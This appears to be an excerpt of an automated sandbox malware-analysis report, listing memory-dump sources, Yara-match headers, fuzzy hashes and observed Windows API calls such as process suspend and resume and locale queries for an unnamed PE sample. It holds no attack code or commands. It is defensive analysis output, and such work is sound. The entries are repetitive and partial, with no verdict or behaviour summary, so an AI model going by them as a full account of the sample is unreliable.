                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1999457699-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2f9544719979d624048292b5ab27ab43be47c8216fe5e38c5e6db7c07fdef43b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36D0A733505132638221176A7C0CC87EE6CDFC1EB37024136F805C3220DE30C88186F4
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041AD08
                                                                                                                                                                                                                                                                                                                              • NtResumeProcess.NTDLL(00000000), ref: 0041AD15
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD1E
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CloseHandleOpenResume
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3614150671-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 37c2ac379339410306f7c92c5038f8fbeac8a1766455cc2515cdfea107740f35
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AD05E32504121638220176A7C0C887EEA9DBC5AB37024236F804C26219A24C841C6A4
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: .
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-248832578
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: .
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-248832578
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 9584f37633f4c414ef5146181f80c6165965705e9984f1eba9c8fd3cb5080f71
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d1e3e1f1b10634f23d7ec4f3447f1f7ccbf8e1e2376058bf121f3d9d2905f228
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9584f37633f4c414ef5146181f80c6165965705e9984f1eba9c8fd3cb5080f71
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1831487E900129BFCB269E3CCC84EFA7BBEDB45344F1401ACE918D7251F63199458BA0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: .
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-248832578
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 873a04302784b116d8a99258add1453e79be975c542385aca68e1d7541cdf5be
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c16af5c7ffbd8c4a49c204f9905b3b3e1e252fc171b94e42c608c02adf969b32
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873a04302784b116d8a99258add1453e79be975c542385aca68e1d7541cdf5be
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D131F4B1904249ABDB14CE78CC84EEB7BBDDF86354F1402A9F519DB251E630EF858B50
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                                                                                              • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 147a43d4a8953c0e587c79f7e81ca7cf09075d603a4ca368f499ea5921ccbf25
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB026D71E002199FEF14CFA9C8806AEBBF1FF88314F25826AD919E7354D774A941CB84
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2cafc3a1602f8d9229f906c35996b6c9b05da501d658cf9aad334e3cb015b51d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ec60a9e03f1742031b91b3dbd8c42c4b5d747c82b6bda5263cb6b490662b12e2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cafc3a1602f8d9229f906c35996b6c9b05da501d658cf9aad334e3cb015b51d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05021D71E042199BDF14CFA9D88069DBBF1FF48324F25826AD919EB385D731EA41CB90
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 4168288129-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b19605d9ec4efeff847f8fcaed604f976ab280517c4d712cab60d63496a3c192
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c8b5a874e3698bc855c7ecc7d7ade8d6710a5506dc5cf5191add4587ac67ce70
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b19605d9ec4efeff847f8fcaed604f976ab280517c4d712cab60d63496a3c192
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFC21771E086298BDB65CE289D80BEAB7F5EB44354F1541EAD84DEB240E774EEC18F40
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520DD,?,?,00000008,?,?,00455422,00000000), ref: 0045230F
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 977e517564c3c3d0049d1222f3e9a6889a5c410b4df8a0f985261284c0187219
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2B18E311106088FD715CF28C586B567BE0FF06325F25869AEC99CF2A2C379E986CB44
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0283B5BC,?,?,00000008,?,?,0283B25C,00000000), ref: 0283B7EE
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 4b388d6902ba5cf1105b10333ceed63cd2377186aa7d47c75764b2c58b43f413
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 185cc88669cb3e0bfc562803d5c323c8ecd91b2e43405aab1d8a7dafaf3e2f36
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b388d6902ba5cf1105b10333ceed63cd2377186aa7d47c75764b2c58b43f413
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EB16179610609DFD71ACF28C486B647BE0FF4536CF258658E899CF2A2C335D992CB80
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?), ref: 1001F7A8
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
